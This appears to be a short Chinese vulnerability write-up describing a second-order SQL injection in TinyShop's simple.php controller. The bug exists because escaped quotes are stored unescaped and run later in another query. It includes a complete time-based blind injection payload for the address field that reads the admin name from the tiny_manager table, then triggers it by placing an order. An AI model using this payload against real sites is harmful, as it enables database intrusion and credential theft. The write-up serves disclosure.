TinyShop二次注入一枚

文章目录

漏洞作者: roker

还是 protected\controllers\simple.php文件

看到

 

 

会把单引号转义为 斜杠+’. 但是进入数据库时 斜杠 是不会进去的。从而造成二次注入。

延时注入测试下。

首先 添加个收货地址,抓包修改 addr=’,’111111′,49,12.00,12.00,’2014-06-27 09:33:13′,”,0,’0′,0,0,52,40,0,1,0,if(ascii(substr((select name from tiny_manager),1,1))-96,sleep(2),null))#

 

27115121bd1a01382f52727c77798412afb00bc1

 

 

用生成的地址 提交订单。

看mysql执行日志,可以看到

#将后面的注释掉,所以实际执行的为

27115804509609ed87f18a2bd99e5bef22875aff

 

延时成功。

可以写个脚本跑下密码。这里就不提供了~

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录